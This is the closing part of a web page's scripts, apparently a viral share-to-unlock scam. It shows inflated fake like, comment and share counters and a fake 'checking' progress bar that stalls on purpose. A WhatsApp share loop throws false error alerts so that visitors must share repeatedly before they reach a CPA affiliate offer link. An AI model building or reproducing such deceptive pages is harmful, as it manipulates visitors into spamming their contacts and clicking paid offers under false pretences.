    $(".t1").html(time + 1 + "m");
    $(".t2").html(time + 2 + "m");
    $(".t3").html(time + 4 + "m");
}, 6e4);
var likes = 134,
    comments = 23,
    shares = 12;
window.setInterval(function () {
    likes = likes + Math.floor(Math.random() * 3);
    comments = comments + Math.floor(Math.random() * 2);
    shares = shares + Math.floor(Math.random() * 2);
    $("#likes").html(likes + "K");
    $("#comments").html(comments + "K comments");
    $("#shares").html(shares + "K shares");
}, 5e3);
$(".liked").click(function () {
    if ($(this).hasClass("selected")) {
        $(this).removeClass("selected");
        $(this).html("Like");
    } else {
        $(this).addClass("selected");
        $(this).html("Unlike");
    }
});  
  
</script>
<script type="text/javascript">
var name = localStorage.getItem("name");
$("#getname").html(name);
$("#select").click(function () {
    var name = $("#name").val();
    localStorage.setItem("name", name);
    var number = $("#grade").val();
    if (name.length < 5 || name.length > 150) {
        alert(errorname);
    } else if (number === "0") {
        alert(errornumber);
    } else {
        $(".step1").fadeOut(0);
        $(".step2").fadeIn(500);
        $("#pastname").html(name);
        $("#pastnumber").html(number);
    }
});
$(".yes").click(function () {
    $(".welcome").fadeOut(0);
    $(".step2").fadeOut(0);
    $("#checking").fadeIn(1000);
    var i = 0;
    var interval = setInterval(function () {
        i += 1;
        $("#percentage").text(i + "%");
        $("#fill").css("width", i + "%");
        if (i == 50) {
            i = 49;
            setTimeout(function () {
                i = 50;
            }, 1000);
        }
        if (i >= 100) {
            clearInterval(interval);
            $("#load").fadeOut(0);
            $("#check").fadeIn(0);
            setTimeout(function () {
                $("#checking").fadeOut(0);
                $("#share").fadeIn(1000);
                $("#getname").html($("#name").val());
            }, 1000);
        }
    }, 50);
});
$(".no").click(function () {
    $(".step2").fadeOut(0);
    $(".step1").fadeIn(500);
});  
</script>  
<script type="text/javascript">  
var swidth = localStorage.getItem(saved);
if (swidth !== null) {
    var width = swidth * 1;
    $(".welcome").fadeOut(0);
    $(".step1").fadeOut(0);
    $("#share").fadeIn(0);
    $("#fill2").css("width", width + "%");
    $("#percentage2").text(width + "%");
} else {
    var width = 0;
}
$("#whatsapp").click(function () {
    window.location.href = share;
    if (width == 0) {
        width += 50;
    } else if (width == 50) {
        alert(error);
        width += 15;
    } else if (width == 65) {
        width += 5;
    } else if (width == 70) {
        alert(error);
        width += 10;
    } else if (width == 80) {
        alert(error);
        width += 5;
    } else if (width == 85) {
        width += 5;
    } else if (width == 90) {
        width += 4;
    } else if (width == 94) {
        width += 2;
    } else if (width == 96) {
        width += 2;
    } else {
        $("#share").fadeOut(0);
        $("#claim").fadeIn(1000);
    }
    localStorage.setItem(saved, width);
    setTimeout(function () {
        $("#fill2").css("width", width + "%");
        $("#percentage2").text(width + "%");
    }, 2000);
});
$("#offer").click(function () {
    window.open(cpa, "_blank");
});  
</script>  
<!-- JS-WP --> 
</script>

</body></html>
<!-- JS GOOGLE -->
<!-- Global site tag (gtagش.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-152330835-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-152330835-1');
</script>
<!-- END -->
